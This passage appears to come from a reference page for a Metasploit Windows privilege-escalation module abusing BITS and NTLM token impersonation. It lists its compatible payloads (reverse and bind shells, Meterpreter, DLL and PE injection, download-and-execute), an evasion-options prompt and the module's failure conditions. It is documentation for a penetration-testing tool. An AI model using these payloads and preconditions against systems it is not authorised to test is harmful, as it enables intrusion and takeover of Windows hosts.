7 payload/windows/dllinject/bind_ipv6_tcp normal No Reflective DLL Injection, Bind IPv6 TCP Stager (Windows x86)
8 payload/windows/dllinject/bind_ipv6_tcp_uuid normal No Reflective DLL Injection, Bind IPv6 TCP Stager with UUID Support (Windows x86)
9 payload/windows/dllinject/bind_named_pipe normal No Reflective DLL Injection, Windows x86 Bind Named Pipe Stager
10 payload/windows/dllinject/bind_nonx_tcp normal No Reflective DLL Injection, Bind TCP Stager (No NX or Win7)
11 payload/windows/dllinject/bind_tcp normal No Reflective DLL Injection, Bind TCP Stager (Windows x86)
12 payload/windows/dllinject/bind_tcp_rc4 normal No Reflective DLL Injection, Bind TCP Stager (RC4 Stage Encryption, Metasm)
13 payload/windows/dllinject/bind_tcp_uuid normal No Reflective DLL Injection, Bind TCP Stager with UUID Support (Windows x86)
14 payload/windows/dllinject/reverse_hop_http normal No Reflective DLL Injection, Reverse Hop HTTP/HTTPS Stager
15 payload/windows/dllinject/reverse_http normal No Reflective DLL Injection, Windows Reverse HTTP Stager (wininet)
16 payload/windows/dllinject/reverse_http_proxy_pstore normal No Reflective DLL Injection, Reverse HTTP Stager Proxy
17 payload/windows/dllinject/reverse_ipv6_tcp normal No Reflective DLL Injection, Reverse TCP Stager (IPv6)
18 payload/windows/dllinject/reverse_nonx_tcp normal No Reflective DLL Injection, Reverse TCP Stager (No NX or Win7)
19 payload/windows/dllinject/reverse_ord_tcp normal No Reflective DLL Injection, Reverse Ordinal TCP Stager (No NX or Win7)
20 payload/windows/dllinject/reverse_tcp normal No Reflective DLL Injection, Reverse TCP Stager
21 payload/windows/dllinject/reverse_tcp_allports normal No Reflective DLL Injection, Reverse All-Port TCP Stager
22 payload/windows/dllinject/reverse_tcp_dns normal No Reflective DLL Injection, Reverse TCP Stager (DNS)
23 payload/windows/dllinject/reverse_tcp_rc4 normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
24 payload/windows/dllinject/reverse_tcp_rc4_dns normal No Reflective DLL Injection, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
25 payload/windows/dllinject/reverse_tcp_uuid normal No Reflective DLL Injection, Reverse TCP Stager with UUID Support
26 payload/windows/dllinject/reverse_winhttp normal No Reflective DLL Injection, Windows Reverse HTTP Stager (winhttp)
27 payload/windows/dns_txt_query_exec normal No DNS TXT Record Payload Download and Execution
28 payload/windows/download_exec normal No Windows Executable Download (http,https,ftp) and Execute
29 payload/windows/exec normal No Windows Execute Command
30 payload/windows/loadlibrary normal No Windows LoadLibrary Path
31 payload/windows/messagebox normal No Windows MessageBox
32 payload/windows/meterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind Ipknock TCP Stager
33 payload/windows/meterpreter/bind_hidden_tcp normal No Windows Meterpreter (Reflective Injection), Hidden Bind TCP Stager
34 payload/windows/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
35 payload/windows/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
36 payload/windows/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Bind Named Pipe Stager
37 payload/windows/meterpreter/bind_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (No NX or Win7)
38 payload/windows/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (Windows x86)
39 payload/windows/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
40 payload/windows/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
41 payload/windows/meterpreter/reverse_hop_http normal No Windows Meterpreter (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
42 payload/windows/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (wininet)
43 payload/windows/meterpreter/reverse_http_proxy_pstore normal No Windows Meterpreter (Reflective Injection), Reverse HTTP Stager Proxy
44 payload/windows/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (wininet)
45 payload/windows/meterpreter/reverse_https_proxy normal No Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager with Support for Custom Proxy
46 payload/windows/meterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (IPv6)
47 payload/windows/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection), Windows x86 Reverse Named Pipe (SMB) Stager
48 payload/windows/meterpreter/reverse_nonx_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
49 payload/windows/meterpreter/reverse_ord_tcp normal No Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
50 payload/windows/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager
51 payload/windows/meterpreter/reverse_tcp_allports normal No Windows Meterpreter (Reflective Injection), Reverse All-Port TCP Stager
52 payload/windows/meterpreter/reverse_tcp_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (DNS)
53 payload/windows/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
54 payload/windows/meterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
55 payload/windows/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection), Reverse TCP Stager with UUID Support
56 payload/windows/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
57 payload/windows/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection), Windows Reverse HTTPS Stager (winhttp)
58 payload/windows/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline
59 payload/windows/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline
60 payload/windows/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline
61 payload/windows/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline
62 payload/windows/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6)
63 payload/windows/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline
64 payload/windows/metsvc_bind_tcp normal No Windows Meterpreter Service, Bind TCP
65 payload/windows/metsvc_reverse_tcp normal No Windows Meterpreter Service, Reverse TCP Inline
66 payload/windows/patchupdllinject/bind_hidden_ipknock_tcp normal No Windows Inject DLL, Hidden Bind Ipknock TCP Stager
67 payload/windows/patchupdllinject/bind_hidden_tcp normal No Windows Inject DLL, Hidden Bind TCP Stager
68 payload/windows/patchupdllinject/bind_ipv6_tcp normal No Windows Inject DLL, Bind IPv6 TCP Stager (Windows x86)
69 payload/windows/patchupdllinject/bind_ipv6_tcp_uuid normal No Windows Inject DLL, Bind IPv6 TCP Stager with UUID Support (Windows x86)
70 payload/windows/patchupdllinject/bind_named_pipe normal No Windows Inject DLL, Windows x86 Bind Named Pipe Stager
71 payload/windows/patchupdllinject/bind_nonx_tcp normal No Windows Inject DLL, Bind TCP Stager (No NX or Win7)
72 payload/windows/patchupdllinject/bind_tcp normal No Windows Inject DLL, Bind TCP Stager (Windows x86)
73 payload/windows/patchupdllinject/bind_tcp_rc4 normal No Windows Inject DLL, Bind TCP Stager (RC4 Stage Encryption, Metasm)
74 payload/windows/patchupdllinject/bind_tcp_uuid normal No Windows Inject DLL, Bind TCP Stager with UUID Support (Windows x86)
75 payload/windows/patchupdllinject/reverse_ipv6_tcp normal No Windows Inject DLL, Reverse TCP Stager (IPv6)
76 payload/windows/patchupdllinject/reverse_nonx_tcp normal No Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
77 payload/windows/patchupdllinject/reverse_ord_tcp normal No Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
78 payload/windows/patchupdllinject/reverse_tcp normal No Windows Inject DLL, Reverse TCP Stager
79 payload/windows/patchupdllinject/reverse_tcp_allports normal No Windows Inject DLL, Reverse All-Port TCP Stager
80 payload/windows/patchupdllinject/reverse_tcp_dns normal No Windows Inject DLL, Reverse TCP Stager (DNS)
81 payload/windows/patchupdllinject/reverse_tcp_rc4 normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
82 payload/windows/patchupdllinject/reverse_tcp_rc4_dns normal No Windows Inject DLL, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
83 payload/windows/patchupdllinject/reverse_tcp_uuid normal No Windows Inject DLL, Reverse TCP Stager with UUID Support
84 payload/windows/patchupmeterpreter/bind_hidden_ipknock_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind Ipknock TCP Stager
85 payload/windows/patchupmeterpreter/bind_hidden_tcp normal No Windows Meterpreter (skape/jt Injection), Hidden Bind TCP Stager
86 payload/windows/patchupmeterpreter/bind_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager (Windows x86)
87 payload/windows/patchupmeterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
88 payload/windows/patchupmeterpreter/bind_named_pipe normal No Windows Meterpreter (skape/jt Injection), Windows x86 Bind Named Pipe Stager
89 payload/windows/patchupmeterpreter/bind_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (No NX or Win7)
90 payload/windows/patchupmeterpreter/bind_tcp normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (Windows x86)
91 payload/windows/patchupmeterpreter/bind_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
92 payload/windows/patchupmeterpreter/bind_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Bind TCP Stager with UUID Support (Windows x86)
93 payload/windows/patchupmeterpreter/reverse_ipv6_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (IPv6)
94 payload/windows/patchupmeterpreter/reverse_nonx_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (No NX or Win7)
95 payload/windows/patchupmeterpreter/reverse_ord_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse Ordinal TCP Stager (No NX or Win7)
96 payload/windows/patchupmeterpreter/reverse_tcp normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager
97 payload/windows/patchupmeterpreter/reverse_tcp_allports normal No Windows Meterpreter (skape/jt Injection), Reverse All-Port TCP Stager
98 payload/windows/patchupmeterpreter/reverse_tcp_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (DNS)
99 payload/windows/patchupmeterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
100 payload/windows/patchupmeterpreter/reverse_tcp_rc4_dns normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
101 payload/windows/patchupmeterpreter/reverse_tcp_uuid normal No Windows Meterpreter (skape/jt Injection), Reverse TCP Stager with UUID Support
102 payload/windows/peinject/bind_hidden_ipknock_tcp normal No Windows Inject PE Files, Hidden Bind Ipknock TCP Stager
103 payload/windows/peinject/bind_hidden_tcp normal No Windows Inject PE Files, Hidden Bind TCP Stager
104 payload/windows/peinject/bind_ipv6_tcp normal No Windows Inject PE Files, Bind IPv6 TCP Stager (Windows x86)
105 payload/windows/peinject/bind_ipv6_tcp_uuid normal No Windows Inject PE Files, Bind IPv6 TCP Stager with UUID Support (Windows x86)
106 payload/windows/peinject/bind_named_pipe normal No Windows Inject PE Files, Windows x86 Bind Named Pipe Stager
107 payload/windows/peinject/bind_nonx_tcp normal No Windows Inject PE Files, Bind TCP Stager (No NX or Win7)
108 payload/windows/peinject/bind_tcp normal No Windows Inject PE Files, Bind TCP Stager (Windows x86)
109 payload/windows/peinject/bind_tcp_rc4 normal No Windows Inject PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
110 payload/windows/peinject/bind_tcp_uuid normal No Windows Inject PE Files, Bind TCP Stager with UUID Support (Windows x86)
111 payload/windows/peinject/reverse_ipv6_tcp normal No Windows Inject PE Files, Reverse TCP Stager (IPv6)
112 payload/windows/peinject/reverse_named_pipe normal No Windows Inject PE Files, Windows x86 Reverse Named Pipe (SMB) Stager
113 payload/windows/peinject/reverse_nonx_tcp normal No Windows Inject PE Files, Reverse TCP Stager (No NX or Win7)
114 payload/windows/peinject/reverse_ord_tcp normal No Windows Inject PE Files, Reverse Ordinal TCP Stager (No NX or Win7)
115 payload/windows/peinject/reverse_tcp normal No Windows Inject PE Files, Reverse TCP Stager
116 payload/windows/peinject/reverse_tcp_allports normal No Windows Inject PE Files, Reverse All-Port TCP Stager
117 payload/windows/peinject/reverse_tcp_dns normal No Windows Inject PE Files, Reverse TCP Stager (DNS)
118 payload/windows/peinject/reverse_tcp_rc4 normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
119 payload/windows/peinject/reverse_tcp_rc4_dns normal No Windows Inject PE Files, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
120 payload/windows/peinject/reverse_tcp_uuid normal No Windows Inject PE Files, Reverse TCP Stager with UUID Support
121 payload/windows/pingback_bind_tcp normal No Windows x86 Pingback, Bind TCP Inline
122 payload/windows/pingback_reverse_tcp normal No Windows x86 Pingback, Reverse TCP Inline
123 payload/windows/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
124 payload/windows/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
125 payload/windows/shell/bind_hidden_ipknock_tcp normal No Windows Command Shell, Hidden Bind Ipknock TCP Stager
126 payload/windows/shell/bind_hidden_tcp normal No Windows Command Shell, Hidden Bind TCP Stager
127 payload/windows/shell/bind_ipv6_tcp normal No Windows Command Shell, Bind IPv6 TCP Stager (Windows x86)
128 payload/windows/shell/bind_ipv6_tcp_uuid normal No Windows Command Shell, Bind IPv6 TCP Stager with UUID Support (Windows x86)
129 payload/windows/shell/bind_named_pipe normal No Windows Command Shell, Windows x86 Bind Named Pipe Stager
130 payload/windows/shell/bind_nonx_tcp normal No Windows Command Shell, Bind TCP Stager (No NX or Win7)
131 payload/windows/shell/bind_tcp normal No Windows Command Shell, Bind TCP Stager (Windows x86)
132 payload/windows/shell/bind_tcp_rc4 normal No Windows Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
133 payload/windows/shell/bind_tcp_uuid normal No Windows Command Shell, Bind TCP Stager with UUID Support (Windows x86)
134 payload/windows/shell/reverse_ipv6_tcp normal No Windows Command Shell, Reverse TCP Stager (IPv6)
135 payload/windows/shell/reverse_nonx_tcp normal No Windows Command Shell, Reverse TCP Stager (No NX or Win7)
136 payload/windows/shell/reverse_ord_tcp normal No Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
137 payload/windows/shell/reverse_tcp normal No Windows Command Shell, Reverse TCP Stager
138 payload/windows/shell/reverse_tcp_allports normal No Windows Command Shell, Reverse All-Port TCP Stager
139 payload/windows/shell/reverse_tcp_dns normal No Windows Command Shell, Reverse TCP Stager (DNS)
140 payload/windows/shell/reverse_tcp_rc4 normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
141 payload/windows/shell/reverse_tcp_rc4_dns normal No Windows Command Shell, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
142 payload/windows/shell/reverse_tcp_uuid normal No Windows Command Shell, Reverse TCP Stager with UUID Support
143 payload/windows/shell/reverse_udp normal No Windows Command Shell, Reverse UDP Stager with UUID Support
144 payload/windows/shell_bind_tcp normal No Windows Command Shell, Bind TCP Inline
145 payload/windows/shell_bind_tcp_xpfw normal No Windows Disable Windows ICF, Command Shell, Bind TCP Inline
146 payload/windows/shell_hidden_bind_tcp normal No Windows Command Shell, Hidden Bind TCP Inline
147 payload/windows/shell_reverse_tcp normal No Windows Command Shell, Reverse TCP Inline
148 payload/windows/speak_pwned normal No Windows Speech API - Say "You Got Pwned!"
149 payload/windows/upexec/bind_hidden_ipknock_tcp normal No Windows Upload/Execute, Hidden Bind Ipknock TCP Stager
150 payload/windows/upexec/bind_hidden_tcp normal No Windows Upload/Execute, Hidden Bind TCP Stager
151 payload/windows/upexec/bind_ipv6_tcp normal No Windows Upload/Execute, Bind IPv6 TCP Stager (Windows x86)
152 payload/windows/upexec/bind_ipv6_tcp_uuid normal No Windows Upload/Execute, Bind IPv6 TCP Stager with UUID Support (Windows x86)
153 payload/windows/upexec/bind_named_pipe normal No Windows Upload/Execute, Windows x86 Bind Named Pipe Stager
154 payload/windows/upexec/bind_nonx_tcp normal No Windows Upload/Execute, Bind TCP Stager (No NX or Win7)
155 payload/windows/upexec/bind_tcp normal No Windows Upload/Execute, Bind TCP Stager (Windows x86)
156 payload/windows/upexec/bind_tcp_rc4 normal No Windows Upload/Execute, Bind TCP Stager (RC4 Stage Encryption, Metasm)
157 payload/windows/upexec/bind_tcp_uuid normal No Windows Upload/Execute, Bind TCP Stager with UUID Support (Windows x86)
158 payload/windows/upexec/reverse_ipv6_tcp normal No Windows Upload/Execute, Reverse TCP Stager (IPv6)
159 payload/windows/upexec/reverse_nonx_tcp normal No Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
160 payload/windows/upexec/reverse_ord_tcp normal No Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
161 payload/windows/upexec/reverse_tcp normal No Windows Upload/Execute, Reverse TCP Stager
162 payload/windows/upexec/reverse_tcp_allports normal No Windows Upload/Execute, Reverse All-Port TCP Stager
163 payload/windows/upexec/reverse_tcp_dns normal No Windows Upload/Execute, Reverse TCP Stager (DNS)
164 payload/windows/upexec/reverse_tcp_rc4 normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
165 payload/windows/upexec/reverse_tcp_rc4_dns normal No Windows Upload/Execute, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
166 payload/windows/upexec/reverse_tcp_uuid normal No Windows Upload/Execute, Reverse TCP Stager with UUID Support
167 payload/windows/upexec/reverse_udp normal No Windows Upload/Execute, Reverse UDP Stager with UUID Support
168 payload/windows/vncinject/bind_hidden_ipknock_tcp normal No VNC Server (Reflective Injection), Hidden Bind Ipknock TCP Stager
169 payload/windows/vncinject/bind_hidden_tcp normal No VNC Server (Reflective Injection), Hidden Bind TCP Stager
170 payload/windows/vncinject/bind_ipv6_tcp normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager (Windows x86)
171 payload/windows/vncinject/bind_ipv6_tcp_uuid normal No VNC Server (Reflective Injection), Bind IPv6 TCP Stager with UUID Support (Windows x86)
172 payload/windows/vncinject/bind_named_pipe normal No VNC Server (Reflective Injection), Windows x86 Bind Named Pipe Stager
173 payload/windows/vncinject/bind_nonx_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (No NX or Win7)
174 payload/windows/vncinject/bind_tcp normal No VNC Server (Reflective Injection), Bind TCP Stager (Windows x86)
175 payload/windows/vncinject/bind_tcp_rc4 normal No VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
176 payload/windows/vncinject/bind_tcp_uuid normal No VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x86)
177 payload/windows/vncinject/reverse_hop_http normal No VNC Server (Reflective Injection), Reverse Hop HTTP/HTTPS Stager
178 payload/windows/vncinject/reverse_http normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (wininet)
179 payload/windows/vncinject/reverse_http_proxy_pstore normal No VNC Server (Reflective Injection), Reverse HTTP Stager Proxy
180 payload/windows/vncinject/reverse_ipv6_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (IPv6)
181 payload/windows/vncinject/reverse_nonx_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
182 payload/windows/vncinject/reverse_ord_tcp normal No VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
183 payload/windows/vncinject/reverse_tcp normal No VNC Server (Reflective Injection), Reverse TCP Stager
184 payload/windows/vncinject/reverse_tcp_allports normal No VNC Server (Reflective Injection), Reverse All-Port TCP Stager
185 payload/windows/vncinject/reverse_tcp_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (DNS)
186 payload/windows/vncinject/reverse_tcp_rc4 normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
187 payload/windows/vncinject/reverse_tcp_rc4_dns normal No VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)
188 payload/windows/vncinject/reverse_tcp_uuid normal No VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support
189 payload/windows/vncinject/reverse_winhttp normal No VNC Server (Reflective Injection), Windows Reverse HTTP Stager (winhttp)
190 payload/windows/x64/exec normal No Windows x64 Execute Command
191 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
192 payload/windows/x64/messagebox normal No Windows MessageBox x64
193 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
194 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
195 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
196 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
197 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
198 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
199 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
200 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
201 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
202 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
203 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
204 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
205 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
206 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
207 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
208 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
209 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
210 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
211 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
212 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
213 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
214 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
215 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
216 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
217 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
218 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
219 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
220 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
221 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
222 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
223 payload/windows/x64/pingback_reverse_tcp normal No Windows x64 Pingback, Reverse TCP Inline
224 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
225 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
226 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
227 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
228 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
229 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
230 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
231 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
232 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
233 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
234 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
235 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
236 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
237 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
238 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
239 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
240 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
241 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
242 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
243 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
244 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
245 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
246 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
247 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
248 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
249 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the windows/local/bits_ntlm_token_impersonation exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/local/bits_ntlm_token_impersonation) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Operating system: <OS>
- BITS behavior on Windows 7 and previous has not been shown vulnerable.
- Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.
- WinRM is running. Target is not exploitable.
- Failed to shutdown BITS.
- BITS is running. Don't panic, the exploit should handle this, but you have to wait for BITS to terminate.
- Session is already elevated.
- Failed to retrieve infos about WinRM and BITS. Access is denied.
- BITS is currently running. It must be down for the exploit to succeed.
- WinRM is currently running. It must be down for the exploit to succeed.
- BITS and WinRM are currently running. They must be down for the exploit to succeed.
- Unknown target arch; unable to assign exploit code
- Operation failed. Trying to elevate the current process...
